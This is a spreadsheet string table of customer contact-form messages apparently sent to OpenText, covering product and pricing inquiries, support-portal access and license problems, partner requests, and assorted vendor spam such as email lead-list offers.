    <t>Hi we are interested in using your OpenText Vendor Invoice Management solution and possibly your Invoice Capture Center._x000D_
_x000D_
We are currently using EEC 6._x000D_
_x000D_
Thanks_x000D_
Carsten Dressler</t>
  </si>
  <si>
    <t>I have a Metastorm support question. We have a contractor here with OpenText but he's on vacation and I'd hate to call him during his off-time. The site is saying we don't have access to support tickets, which I believe we are supposed to. Please call or email me, thanks. - Adam</t>
  </si>
  <si>
    <t>Information on Customer Communications Management Software</t>
  </si>
  <si>
    <t>Do Edocs open in MS Word?</t>
  </si>
  <si>
    <t>Content Management and Printing in Multi-Languages, and Other</t>
  </si>
  <si>
    <t>Dear Sir,_x000D_
Grant me the access to mysupport , I am part of nestle Documentum and D2 team._x000D_
_x000D_
thanks_x000D_
Sreeni</t>
  </si>
  <si>
    <t xml:space="preserve">Hello, we bought two Brava! Desktop Limited CAD products but we cannot obtain the license key for them, can you please help us regarding this problem? Below you can find the product details:_x000D_
Software PIN:     IGC458064_x000D_
Product Description:     Brava! Desktop LIMITED CAD + images. All features._x000D_
Product Version:     16.0_x000D_
Software ID:     6210988DD89A4571B6395604947CE8FE_x000D_
_x000D_
 _x000D_
Software PIN:     IGC458065_x000D_
Product Description:     Brava! Desktop LIMITED CAD + images. All features._x000D_
Product Version:     16.0_x000D_
Software ID:     5C587C9E13AB4DC48DE565AFA3D57217_x000D_
</t>
  </si>
  <si>
    <t>Having trouble logging into the OpenText support sign.</t>
  </si>
  <si>
    <t>I'm working with Compucom on trying to retrieve their online bills.  For account number 068401001 with Easylink Services. Is their a way to retrieve bills online or receive by email?  Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Do you have solution, integration or service which can be offered to businesses using Pentaho softwares?  As we have recently updated our database of Pentaho users across UK, US, APAC and EMEA?_x000D_
_x000D_
Few other lists that might be of your interest:- My SQL, Talend, Jaspersoft, Tableau, Qlikview, Alteryx and many more…_x000D_
_x000D_
Please let me know if this is of interest you, so we can connect a quick call to discuss further._x000D_
_x000D_
Looking forward to your response._x000D_
_x000D_
Regards,_x000D_
Austin Clive_x000D_
Sr. Data Consultant (BRIGADE BIG)_x000D_
512-375-3771_x000D_
</t>
  </si>
  <si>
    <t>we can not access our support center, we want to download patches and updates fo our product OpenText eDOCS. and access knolege base.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,	_x000D_
Would you be interested to acquire an email lead list of Workflow management software Users, which contains business information along with contact details of key decision makers?_x000D_
	_x000D_
Titles available : _x000D_
• CIO, CTO	_x000D_
• SVP, VP of IT_x000D_
• Director of IT_x000D_
• VP Engineering, Manufacturing, Operations_x000D_
• Director Engineering_x000D_
• Product Management Specialists_x000D_
	_x000D_
The list includes complete contact information such as Contact name, Email address, Business Title, Company name, Phone number, Mailing address along with detailed business information._x000D_
_x000D_
Please let me know if there is someone else I may contact regarding our contact database. Alternatively, I would appreciate you passing this along to right person responsible for making such decisions._x000D_
	_x000D_
Best Regards,_x000D_
Tanya Williams_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to login to my account with no luck, I have even tried 'forgotten' password. I receive an email but cannot create new password. </t>
  </si>
  <si>
    <t>Hello, I would like to get into contact with the Accounts Receivable Department for the purpose of requesting a duplicate copy of a contract.  Is there a particular phone number, fax, or email address I may be directed to accordingly for such a request?</t>
  </si>
  <si>
    <t>There is a tremendous need for AI to save governments and tax payers money by replacing the biased, drawn out and hoplelessly bogged down processes in municipalities.  Currently, building approval takes years as every public servant without knowledge of their own bylaws or the laws of the Province makes up the decisions to suit themselves.  That is when they are actually at work.  AI should create a system that is unbiased, follows the laws set out by the governing bodies and is efficient.  The benefit to Canada's economy in reduced wages and in business development would be astronomical.  Instead of waiting 4 years for permits to start your business, all the while American competitors get started in weeks and garner all the market share, we could have building permits etc in minutes.  Please tell me you are looking into this.</t>
  </si>
  <si>
    <t xml:space="preserve">Your developer website is not accessible </t>
  </si>
  <si>
    <t>Good day,_x000D_
_x000D_
Im currently using M-Files and i want to use OpenText, therefore i want to migrate my documents or data to OpenText, can you please assist on how my documents or database should be like so i can move and how do i migrate from M-Files to OpenText, what kind of migration tools do i need._x000D_
Thanks in advance</t>
  </si>
  <si>
    <t>I was reaching out to a contact we had for our Captiva and Interactive Editor.  I have had no response back from the contact or the general renewal email address.  We were expecting an additional renewal than ones we have already received, can you please provide me a contact that I can talk to about this?  I am going to be in meetings until after 1pm CST, so email is preferred communication path.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
könnten Sie mir bitte eine Liste aller OpenText-Partner in Deutschland zusenden? _x000D_
_x000D_
---_x000D_
Mit freundlichen Grüßen, _x000D_
Christoph Moneke _x000D_
_x000D_
Bundesinstitut für Berufsbildung (BIBB)_x000D_
Arbeitsbereich "Internet, Anfragenkoordination, Internes Wissensmanagement"_x000D_
_x000D_
Robert-Schuman-Platz 3, D-53175 Bonn_x000D_
Fon: +49 228 107 1703, Fax: +49 228 9910666 1703_x000D_
moneke@bibb.de, www.bibb.de _x000D_
_x000D_
Folgen Sie dem BIBB auf Twitter: https://twitter.com/BIBB_de _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We need services for OCR,ICR,OMR,MICR service. Please let us know the details about product</t>
  </si>
  <si>
    <t>Madame, Monsieur,_x000D_
_x000D_
Je suis intéressé par votre logiciel d’OCR, et je souhaiterais avoir plus d’informations à son sujet. _x000D_
_x000D_
Quel est le degré de précision du programme ?_x000D_
Le système de facturation est-il en licence ou en achat ?_x000D_
Est-ce un logiciel ou une librairie (est-il possible de personnaliser l’OCR ?) ?_x000D_
Comment le programme gère t-il la symétrie des documents ? (si un document est scanné en biais, l’OCR comprend il quand même le texte) ?_x000D_
_x000D_
Cordialement,_x000D_
_x000D_
Arnaud Doly</t>
  </si>
  <si>
    <t>Is it possible to get a PMC (trial) for Team Developer 6.2?</t>
  </si>
  <si>
    <t>Dear OpenText, _x000D_
_x000D_
We received two letters from John Doolittle about an announcement of your upgrade. _x000D_
I don't have any records of our Library working with OpenText in any way. Could you please clarify why did we receive such mail from you twice?</t>
  </si>
  <si>
    <t>Need developer license to download brava for poc purpose.</t>
  </si>
  <si>
    <t>authenticator code invalid  _x000D_
what must I do?</t>
  </si>
  <si>
    <t>As Brigex , we give services to business software vendors for building/expanding their reseller channel globally._x000D_
_x000D_
Within the scope of our service, we find relevant companies that are interested in reselling/representing your software products and we organize online meetings between you and them for starting business partnerships._x000D_
_x000D_
We charge for the meetings that take place with interested resellers. We do not charge any upfront or retainer fees._x000D_
_x000D_
Please get back to me, if you are interested in cooperating with us for establishing reseller partnerships.</t>
  </si>
  <si>
    <t>_x000D_
 _x000D_
Hello,_x000D_
 _x000D_
Greetings from Webgrity!_x000D_
 _x000D_
To showcase our skills to you, we are offering one time FREE TRIAL program for any web related job. We will offer you 1 hour of service at NO cost. You will not pay anything for first hour and you may decide not to continue after first hour for any reason. We will be happy if you would like to know more about this offer. Just write to us with your requirments and we will be happy to assist._x000D_
 _x000D_
We are located in India and would like to be a part of your BACK END SUPPORT TEAM for Web Design and Development. You may check our website at http://www.webgritytalk.com/_x000D_
 _x000D_
We give unlimited revisions* and lifetime warranty on all projects done by us. (*T and C applies)_x000D_
 _x000D_
  _x000D_
Regards,_x000D_
Elisa Weber_x000D_
Business Development Manager_x000D_
Webgrity</t>
  </si>
  <si>
    <t xml:space="preserve">Want to download Brava for POC purpose for that i need developer license for BRAVA.So Kindly send Download Link to My Email ID. </t>
  </si>
  <si>
    <t>Reset Password link is not working.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi, we are the business partner of IBM ECM in Indonesia, and now we got requirement from client for dynamic watermark in Filenet. Since the original viewer in filenet can't support the dynamic watermark, we're looking to integrate with Brava. Is that possible?_x000D_
_x000D_
Could you inform us the pricing scheme?_x000D_
_x000D_
Looking forward for your response soon_x000D_
_x000D_
Thank you_x000D_
_x000D_
Regards,_x000D_
Renaldi_x000D_
</t>
  </si>
  <si>
    <t>Currently, MFEC has an opportunity for license reselling of OpenText Exceed. One of our customers in banking needs to expand their licenses on OpenText Exceed.</t>
  </si>
  <si>
    <t>wrong name and email address given for person needing the software.  The name given at the time of the order was Manoj Kumar with the email address of manoj.kumar@cmsenergy.com.  The correct person should have been Manoj Kumar 1 with the email address of manoj.kumar1@cmsenergy.com.  Can log on info be sent to the correct person?  This license was purchased through our software vendor SHI.</t>
  </si>
  <si>
    <t>_x000D_
Prezados,_x000D_
 _x000D_
Tivemos algumas mudanças na estrutura de TI e gostaríamos de retomar o contato com os nossos fornecedores._x000D_
_x000D_
Atenciosamente _x000D_
_x000D_
Vanderlei Oliveira</t>
  </si>
  <si>
    <t xml:space="preserve">Interested in OpenText eDOCS for a boutique law firm located in Toronto, ON which operates in a Mac environment, but does have the ability to work in a Windows environment via a Microsoft Windows Server 2012 R2._x000D_
</t>
  </si>
  <si>
    <t>Inquiry about Mac functionality in eDOCS</t>
  </si>
  <si>
    <t xml:space="preserve">Hi  ,_x000D_
Would you be interested in acquire an email lead list of  3D Animation Software  Users, which contains business information along with contact details of key decision makers?_x000D_
_x000D_
Titles available : _x000D_
• CIO, CTO_x000D_
• SVP, VP of IT_x000D_
• Director of IT_x000D_
• VP Engineering, Manufacturing, Operations_x000D_
• Director Engineering_x000D_
• Product Management Specialists_x000D_
_x000D_
The list includes complete contact information such as Contact name, Email address, Business Title, Company name, Phone number, Mailing address along with detailed business information._x000D_
_x000D_
Please let me know if there is someone else I may contact regarding our contact database. Alternatively, I would appreciate you passing this along to right person responsible for making such decisions._x000D_
_x000D_
_x000D_
Best Regards_x000D_
Selina Watson_x000D_
Business Development Executive _x000D_
Target Reach_x000D_
951-373-6718_x000D_
Selinaw@targetreach.biz_x000D_
</t>
  </si>
  <si>
    <t>Interested in OpenText Document Management Systems deployment. Would like an onsite presentation in Waterdown at our offices in the middle of September. We are working through our Business Requirements Document and System Functional Spec in the mean time. A little help with them, ahead of the presentation, would be to your advantage.</t>
  </si>
  <si>
    <t>could you please tell me how to configure the window that opens when you click on a fax to view it? i want the faxes to open up on certain area of the desktop everytime and cannot figure out how to do this.  thanks for your help.</t>
  </si>
  <si>
    <t>We are in the beginning stages of looking to convert our paper files into electronic files.  We are looking to have these documents stored online (server) and then be able to access them, edit them, and set security on them.  I am not sure if your company does this, but thought I would reach out.</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry for ecm: creating and managing content </t>
  </si>
  <si>
    <t>Looking for prices on Cloud based fax service vs license based fax services.  Can you provide me with some info?</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are a third party company working on behalf of Chase to verify employment for an individual at OpenText. Can you please advise how we can go about obtaining the employment verification? If you prefer to call, please call 855-550-6772 and reference #16190468. This information is time sensitive, so your prompt response is appreciated._x000D_
_x000D_
Kindest Regards,_x000D_
_x000D_
Devon Nicole Toovey _x000D_
Verifications Team Lead_x000D_
DataVerify_x000D_
(p) 904.596.5540_x000D_
(f) 888.609.9805_x000D_
Customer Support: 855.550.6772_x000D_
www.dataverify.com_x000D_
</t>
  </si>
  <si>
    <t>You are continually contacting me saying I am not registered as compliant. I have spoken on the telephone with a representative..I have sent to the email address they gave me a copy of my compliance certificate saying I am registered as compliant until June 2018. What more can I do to srop you making monthly charges. What is the use of a certificate provided by yourselves if you refuse to honour it?  What is your problem</t>
  </si>
  <si>
    <t>Need access to My Support... BRAVA DESKTOP SXL / CAD</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
I understand your participation at “HIMSS18 Conference &amp; Exhibition” at Las Vegas, NV._x000D_
_x000D_
I was going through your company website and thought you would be interested in acquiring the email list of “Medial and Healthcare Professionals Database” for your sales and marketing initiatives._x000D_
_x000D_
List includes key contacts like:-_x000D_
	•	Health IT professionals_x000D_
	•	Clinicians_x000D_
	•	Executives _x000D_
	•	Hospitals_x000D_
	•	Health systems_x000D_
	•	Academic medical centers_x000D_
	•	Integrated networks_x000D_
	•	Medical groups _x000D_
	•	vendors from around the world._x000D_
_x000D_
Job Title:-  Senior-level marketing, strategy, physician relations, sales, and business development executives etc.…_x000D_
_x000D_
Please write a line with your exact target audience in order to get back to you with counts and free samples for your review._x000D_
_x000D_
Target Physicians : ___________ (Any) _x000D_
Target Geography : ___________ (USA, UK, Canada, Australia, Europe and other country around the world)_x000D_
Target Job Title      : ___________ (CVDM)_x000D_
_x000D_
Thank you and I look forward to hearing from you._x000D_
_x000D_
 Regards,              _x000D_
Janet Warren| Business Development coordinator_x000D_
_x000D_
_x000D_
SERVICES -Consumer List | Technology List | Healthcare list | Event Promotion | Email Appending | Email Campaigns | SEO |Content writing| Telemarketing services_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Trying to determine if you are a large or small company and if small, are your minority-owned, women-owned, veteran-owned, disabled, 8(a), etc?</t>
  </si>
  <si>
    <t xml:space="preserve">Please give the price for: _x000D_
PRODUCT NAME : BRAVA! FOR CONTENT SUITE - DOCS ONLY - BASE MODULE._x000D_
PART# S-IGR-3-OT-D-ANNOTATION-KIT UNITS :_x000D_
STANDARD NAMED USERS_x000D_
</t>
  </si>
  <si>
    <t>We are planning to redesign our architecture for CMS and Document Management Systems. Can you provide documentations of your SaaS offering. I have documentation of your hosted solution. _x000D_
Thanks._x000D_
Jeewan Negi</t>
  </si>
  <si>
    <t>Good Afternoon,_x000D_
_x000D_
My name is Richard and I am writing you from Roma Murphy &amp; Horowitz Commercial Collection Agency.  _x000D_
_x000D_
I wanted to introduce our services to your firm.  RMH has various methods in collecting for our clients that are unique and unlike what you may be familiar with when it comes to collection agencies._x000D_
_x000D_
We are a nationwide firm that specializes in commercial  collections  for our clients on a contingency basis. Having been in business now for 19 years, our client base stretches across the entire United States as well as in Canada and Mexico._x000D_
_x000D_
Things like your clients going beyond their normal “net” terms in paying you for your products.  Or clients of yours not replying to your emails, phone calls or letters that you have sent them regarding a past due amount they may owe you._x000D_
_x000D_
These situations are everyday occurrences for RMH.  Our firm has not only developed but maintained mutually beneficial relationships with our clients for over 19 years now by doing what we do best…..Collecting on past due accounts that are owed to our clients!!! USE our experience to your advantage._x000D_
_x000D_
RMH actively use investigators  to pursue your debtors and  get you paid.  By providing you with a thorough Forensic Financial Investigation and background check on your debtors and other techniques, we are confident in our abilities to collect on your behalf.  _x000D_
_x000D_
RMH investigators have a combined experience in this industry of 100 years.  Use our experience to help recover monies that are owed to your company._x000D_
_x000D_
Our rates are determined by the aging of your past due accounts and again strictly on a contingency basis.  Meaning there are no upfront  costs for our services.  We will not get paid until you get paid._x000D_
_x000D_
Roma Murphy &amp; Horowitz can be cost effective on accounts as low as $300 on up.  In our 19 years of experience  we have found when an account gets to the  60, 75 or 90 days past due  status it is time  to take a serious look at collections.  _x000D_
_x000D_
My office hou</t>
  </si>
  <si>
    <t>How to become opentext's partner and the ability of the solution to provide physical record management. And want to know the price of the solution</t>
  </si>
  <si>
    <t>Dear Open Text team,_x000D_
I'm writing you in behalf the International Committee of the Red Cross based in Geneva, Switzerland. We're currently launching an RFP process looking for a DAM system to increase our organizational efficiency. _x000D_
_x000D_
Our hope is to find a product that will solve all our video management and photo workflow/management needs:_x000D_
- To storing current and future audio-visual (including rushes) and other files from all sources. _x000D_
- Able to editing, subtitling, XML management, transcoding, etc._x000D_
- To improve our video and photo workflow/management needs._x000D_
- To accelerate the file transfer between the field teams (worldwide) and the HQ._x000D_
_x000D_
Could you please contact me by email to arrange a discussion?_x000D_
Thanks for your reply._x000D_
_x000D_
Best regards_x000D_
_x000D_
Ismael C. Fricker _x000D_
Digital Project Manager _x000D_
International Committee of the Red Cross</t>
  </si>
  <si>
    <t xml:space="preserve">We at RealGuestBlogging offers a variety of digital media services which includes Brand Marketing, Online Reputation Management and securing mentions on Top tier editorial publications. _x000D_
We have an outreaching PR team to work with the journalists and get them involved in working with us. This gives a huge reputation to your BRAND and improves the online presence in the most natural way possible. _x000D_
What do we do?_x000D_
-- We will analyze your website and prepare a pitch to discuss with top editorial authors._x000D_
-- They will check and send us an update if our site is a good fit to get mentioned in their articles._x000D_
Features:_x000D_
-- Secure High authority links from editorials in the most natural way. _x000D_
-- We have a lot of options available to make our business risk-free._x000D_
-- We will commit the project after discussing your site with the author, so you will on board after 100% confirmation._x000D_
_x000D_
Our success rate in getting articles published on these sites are very high and has never dropped right from the beginning. This is because our process is very transparent and we have only qualified Journalists on board._x000D_
_x000D_
Let us know if you're interested in working with us. We will assist you throughout the project._x000D_
Looking forward to your response._x000D_
_x000D_
_x000D_
Thanks._x000D_
Will_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We need a proposal to a customer who requires RightFax. They have one some time ago,and want a new one; with:_x000D_
_x000D_
4 channels SIP/T.38 Cisco Call Manager_x000D_
AD and mail integration_x000D_
Phisical server instalation_x000D_
_x000D_
Address: Lisbon - Portugal_x000D_
Can you supply a quote ASAP?_x000D_
</t>
  </si>
  <si>
    <t>Need demo on HR capabilites</t>
  </si>
  <si>
    <t>Request for campus recruitment in our college</t>
  </si>
  <si>
    <t xml:space="preserve">Bom dia, tudo bom? _x000D_
_x000D_
Utiliza serviços de traduções técnicas ou juramentadas?   _x000D_
_x000D_
A SP Traduções tem a solução para suas necessidades em traduções, trabalhamos com diversos idiomas tais como: inglês - espanhol - francês - italiano - chinês - japonês - alemão - entre outros.  _x000D_
_x000D_
Temos uma equipe de tradutores capacitados em diferentes áreas para atender sua empresa, algumas delas:  acadêmica – engenharia – jurídica – marketing – médica – petroquímica – patentes – entre outras._x000D_
_x000D_
Estou à disposição para quaisquer dúvidas ou esclarecimentos que faça necessário.   _x000D_
_x000D_
Solicite suas cotações conosco, temos ótimas vantagens para você e sua empresa!_x000D_
_x000D_
Att,_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
_x000D_
Hope all is well! Would you be interested in acquiring email database of e-Signature software users list?_x000D_
Our database includes Decision Makers from:_x000D_
eSignLive users	Legalesign users_x000D_
DocuSign users 	RightSignature users_x000D_
Adobe Sign users 	HelloSign users_x000D_
_x000D_
Our database include verified email address along with multi-channel marketing detail like NPI Number, company name, company website, contact name, contact title, address, phone, fax, SIC Code, employee size, revenue size, SIC code, industry descriptions etc…, _x000D_
_x000D_
Among other services we offer: Global B2B list, custom list, Technology list, email appending and other data appending services._x000D_
_x000D_
Please let me know your interest and schedule for a quick call to discuss in detail. If there is someone else in your organization that I need to speak in this regard, I would be very grateful if you could provide their details or forward this email to him/her, thanks in advance for your help!_x000D_
_x000D_
Await your response…._x000D_
</t>
  </si>
  <si>
    <t>We are looking to integrate fcb2b EDI docs. I believe you guys have a software package that does that for 832 doc. Please let me know the details.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi_x000D_
_x000D_
I need to get the support login details for Sasol Pty LTD._x000D_
_x000D_
Can you please assist with the relevant person or representative in SA that can assist._x000D_
_x000D_
Thanks_x000D_
Pieter </t>
  </si>
  <si>
    <t xml:space="preserve">Purchased Brava! Desktop DXP Received Email confirmation but unable to follow instructions to obtain software / Activation codes. Cannot find Accounts ref </t>
  </si>
  <si>
    <t xml:space="preserve">I am trying to download V1sp4Fix3 designer, but i dont know my customer credential or even if Cummins have one, how can i know this information? </t>
  </si>
  <si>
    <t>Hello Team,_x000D_
_x000D_
I need access to the knowledge centre through which i would be able to download various documents._x000D_
_x000D_
I am specifically looking for access to the Extended ECM stuff_x000D_
_x000D_
Could you please do the necessary to have me access? Please feel free to reach out to me in case you need additional information from my end_x000D_
_x000D_
Thanks &amp; Regards,_x000D_
Mayur Lagad</t>
  </si>
  <si>
    <t>I am a Sr. Product Manager at OpenText and am trying to reach the product manager for Documentum to talk about some of the product synergies. _x000D_
_x000D_
Regards, _x000D_
Sumit</t>
  </si>
  <si>
    <t>Wanted to enable my team in Stratesys eDMS application, need more information on type of trainings, schedule, location and cost for the training. FYI, team is based out of Bangalore.</t>
  </si>
  <si>
    <t xml:space="preserve">Guten Tag, wir betreiben aktuell eine DOMEA 4.0 Installation und planen zeitnah auf DOMEA 4.6 upgraden. _x000D_
Daher wollte ich fragen, ob es evtl. ein Dokument mit einem empfohlenen Upgrade-Pfad mit den entsprechenden Steps gibt?_x000D_
Vielleicht gibt es auch ein Dokument mit den Unterschieden von 4.0 zu 4.6?_x000D_
Es wäre sehr freundlichen, wenn Si Emir da vielleicht weiterhelfen könnten._x000D_
Vielen Dank im Voraus_x000D_
Mit freundlichen Grüßen_x000D_
Nick Schirmer_x000D_
</t>
  </si>
  <si>
    <t>I am looking for accounts payable invoice scanning solution which will through OCR identify, vendor names, invoice nr, purchase order number etc. and automatically interface that to SAP.  I am based in Nigeria, do you have any representation here?</t>
  </si>
  <si>
    <t>We require training on the below mentioned subject. _x000D_
_x000D_
3-3710 OpenText Communication Center Enterprise (CCE) Fundamentals v16 - NEW !_x000D_
·         3-3710 OpenText StreamServe Fundamentals_x000D_
·         3-3715 OpenText StreamServe Document Automation and Post Processing_x000D_
·         3-3740 OpenText StreamServe/SAP Document Presentment Bootcamp</t>
  </si>
  <si>
    <t>Would like to evaluate features of the product</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Madam_x000D_
_x000D_
Good Day._x000D_
_x000D_
Our Company is currently looking for the Document Management System that you provide. we have retained a few potential providers that would seem to offer what we need. We have evaluated your company and please be inform us that your company belongs to that select group._x000D_
_x000D_
We would greatly appreciate it if you would be willing to provide us an estimate for DMS until 6th September 2017 , including all relevant documentation. Please put an emphasis on what sets your company apart. Details of this endeavor are described in the enclosed attached file, entitled ISC- Document Management System (DMS)-RFP._x000D_
_x000D_
_x000D_
Thank you for your efforts in providing this proposal._x000D_
_x000D_
Sincerely._x000D_
_x000D_
_x000D_
Sara Parsa_x000D_
Commercial Expert_x000D_
Informatics Services Co. _x000D_
Tel: +98 2127377153_x000D_
Add: Marjan Bldg#6, Madadkaran st, Shahnazary st, Mirdamad BLVD,_x000D_
Tehran-IRAN _x000D_
Email: s_parsa@isc.co.ir_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Do you have enough participants to deliver this course on scheduled date (2017/09/14 @ Ottawa)? I prefer to register this course._x000D_
Thank you!_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">One of our vendors is on your platform for EDI and wanted to see what I needed to do to be able to be on EDI for them. </t>
  </si>
  <si>
    <t>Looking to purchase licenses for global360 imaging for windows. We're looking at about 150 licenses.</t>
  </si>
  <si>
    <t>I am trying to get my GS1 Company prefix certificate</t>
  </si>
  <si>
    <t>Goog afternoon, I am not sure if Hydro-Québec, the company i'm working for, has an active support contract , but i'm pretty sure it does. Is it possible to know how to get the access to My Support?_x000D_
Thank you very much.</t>
  </si>
  <si>
    <t>To access OpenText documentation</t>
  </si>
  <si>
    <t>We currently use OpenText at our company.  We are considering purchasing the add on CAD Manager.  My manager has given me the task of gathering the information on the product.  I'm not very familiar with library type systems.  I have to pull together a report to what we want to do with the software and it's benefits to our department.  I was wondering if someone could give me a demo of how the software would be a benefit for us?</t>
  </si>
  <si>
    <t>Club Auto is an automotive company empowered by CAA. It is the premier provider of B2B roadside assistance services in the country. As part of my role, I am trying to engage the most efficient practices for the Solutions Centre (Contact Centre) therefore very interested in the Qfiniti Optimize for our agents. I would like to know if our systems could be integrated (DOS into Salesforce), and more.</t>
  </si>
  <si>
    <t xml:space="preserve">start our own company coin am investor today i have 1 LAK DATA BASE for investment market _x000D_
constant only mailing  </t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
This is Stefan Walker. Would you be interested in acquiring the B2B contacts from various titles mentioned below:_x000D_
_x000D_
CEO/CFO, President, VP, CAD Manager, CAD Engineers, CAM Manager, CAM Engineers, , System Designers and Architects, Logic and Circuit Designers, Validation Engineers, Senior Managers and Systems Software Manager, Developer, Network and Communications Managers, Data Center and Cloud architects, Project Manager, Network Manager, VP/Director of IT, IT Manager, Data Analysts, Technology, Electronic and Electrical equipment assemblers, Network Engineer, CRM user, IT resellers and many more which might be interested in your services._x000D_
_x000D_
You can prefer any industry you want to target. Kindly share your requirements and I will get back to you with details such as Counts, Pricing and more._x000D_
_x000D_
Target Industry:_x000D_
Target Job titles:_x000D_
Target Geography:_x000D_
_x000D_
Thanking you in anticipation._x000D_
_x000D_
Regards,_x000D_
Stefan Walker</t>
  </si>
  <si>
    <t>Buenas tardes, tenemos problemas con la version de Alchemy web 9, no se pueden habilitar el subir archivos.</t>
  </si>
  <si>
    <t>Can you please quote quantity 50:  202-0930440 Open Text Fax Server Connector 3.0 for_x000D_
Ricoh ESA MFP 50 to 499 Devices</t>
  </si>
  <si>
    <t xml:space="preserve">We have upgraded a computer and a laptop.  Computer is windows based and laptop is a MAC, I need to download Brava to both from our original subscription. </t>
  </si>
  <si>
    <t>We have been asked to upgrade to Metrics Manager v16.0.1. I do not see documentation online for this. Can you send me documentation on this version? I'm looking for technical specs, differences in features, etc._x000D_
_x000D_
Also, we previously worked with Gae Pitman, but my email to her failed. Can you also direct me to her replacement?</t>
  </si>
  <si>
    <t>I am researching new OCR solutions that are able to to take incoming data feeds (email and web based portals) and turn diverse pdf document images into a consistent EDI message to feed into a legacy ERP system.  Please contact me with any options you may have.</t>
  </si>
  <si>
    <t>Hi,_x000D_
 _x000D_
Please provide quote with reseller discount for our Customer “FIS” for below product:_x000D_
 _x000D_
Quantity Requested – 5_x000D_
Manufacturer – OpenText_x000D_
Product Description – Opentext HP Exstream Designer_x000D_
Product Platform – Windows_x000D_
Business Type – Corporate_x000D_
Type – New</t>
  </si>
  <si>
    <t>looking for a new content/document management system. would like an overview</t>
  </si>
  <si>
    <t>I wan to fuck someone</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted to reach out to you to see if you would be interested in participating in a CISO Summit my company, EC-Council is bringing to The Hague for Cyber Security Week. We have a long history of exceptional CISO events in the US and we’re excited to partner with Dutch companies to bring our events to Europe! A bit more about the event is below and our website is here: https://ciso.eccouncil.org/portfolio/ciso-summit-netherlands-2017/._x000D_
_x000D_
EC-Council is bringing their CISO event series to Europe for the first time! Now in its 7th year, EC-Councils CISO Event Program brings speakers, attendees, and sponsors from all over the world together to discuss the ever-changing field of executive information security management. Topics focus on leadership, strategic management, innovation, and cutting-edge solutions to the challenge of leading large information security programs. The Netherlands CISO Summit will bring leaders from the region as speakers and attendees for keynotes, panel discussions, round-tables followed by a cocktail reception! Only Director-Level and above information security practitioners (no sales) are invited to attend._x000D_
_x000D_
I would be interested to see if you would like to send one or two speakers from your company as well as attendees that might get a lot out of the event. Please contact me with further questions and I would love to arrange a call to discuss any questions you may have._x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
Would you be interested in obtaining email database of Document Management Software Users?_x000D_
_x000D_
This list Contains Company name, Web address ,Contact name, Phone number, Email address, Title, physical address, City, State ,Zip Code, Country, Phone number, Fax Number, Employee size and last verified date._x000D_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</si>
  <si>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 xml:space="preserve">Hi, I am trying to access learning central and cannot, is there any restriction on my profile? </t>
  </si>
  <si>
    <t>Interested in Process Suite 16 for building case management applications</t>
  </si>
  <si>
    <t>Visual Manufacturing customer needs their REPBI52.EXE to modify reports.  The activation is not working.  Please advise.</t>
  </si>
  <si>
    <t>We are currently running RightFax 10.0 in a VM and are in the process of upgrading to 10.6. We are also considering moving our dialtone from a local PRI to a cloud service, while keeping the RightFax server local. Do you have any best practices on performing the upgrade? Do you have any recommended providers for providing dialtone in the cloud?</t>
  </si>
  <si>
    <t>Looking for access to the "My Support" page to read documentation for DoD client - specifically for the BPM suite. Deloitte should have a partnership with OpenText to give my account access. Thanks - James</t>
  </si>
  <si>
    <t>Cannot find on the OpenText Site where to download the activation key. The emails states to got he Accounts on the Top Menu but there is no Accounts link to be seen.</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Team,_x000D_
_x000D_
We are software services company based out of Mumbai, we were thinking to explore open text enterprise content managemnt -opentext document management product api for integration_x000D_
_x000D_
We would like to know, is there any development account we can get for exploring this product API for integration?_x000D_
_x000D_
Thanks_x000D_
Harsh_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>I am trying to inquire about pricing for the SMTP Connector for HP MFP module that is available for Rightfax.  We would also like to know if there is a demo of this product available as we would need to test this to deliver a Proof of Concept to our Directors._x000D_
_x000D_
Thanks.</t>
  </si>
  <si>
    <t xml:space="preserve">Cannot access support portal. It was enabled yesterday but cannot access today. </t>
  </si>
  <si>
    <t>Hello, _x000D_
I would like to have a vendor's manual for Brava to get to know it better and optimize it's use. _x000D_
_x000D_
Regards,_x000D_
Nadine Brathwaite</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We are working with an opportunity here in Uruguay, and I would like to move forward with this issue._x000D_
I really appreciate if you could contact me ASAP._x000D_
_x000D_
Thanks,_x000D_
Kind Regards,_x000D_
Alvaro Suárez</t>
  </si>
  <si>
    <t>I want to become the partner for OpenText.</t>
  </si>
  <si>
    <t>HeJag har nyligen tagit över ansvaret för IT i företaget, och upptäckt att vår IT-dokumentation är extremt bristfällig. Jag skulle därför vilja veta vilka avtal vi har med er och till vilken grad de tjänster som vi köper från er (t.ex. Streamserve) faktiskt utnyttjas.</t>
  </si>
  <si>
    <t xml:space="preserve">We have a plan to develop EDI with our supplier in Czech Republic and some of other European countries. We'd like to consider your product for it. </t>
  </si>
  <si>
    <t>As employee of SAP AG I need access to the download links to install it in our business systems.</t>
  </si>
  <si>
    <t>Sehr geehrte Damen und Herren,_x000D_
_x000D_
Bitte senden Sie mir Informationen bezüglich über ihre Web Content Management Lösung. Wir stehen davor die Corporate Website neu zu gestalten und unser Web ECMS neu auszuwählen. Ich benötige Unterlage über Funktionsumfang und Kosten (Initial/Module), bestenfalls tabellarisch aufbereitet._x000D_
_x000D_
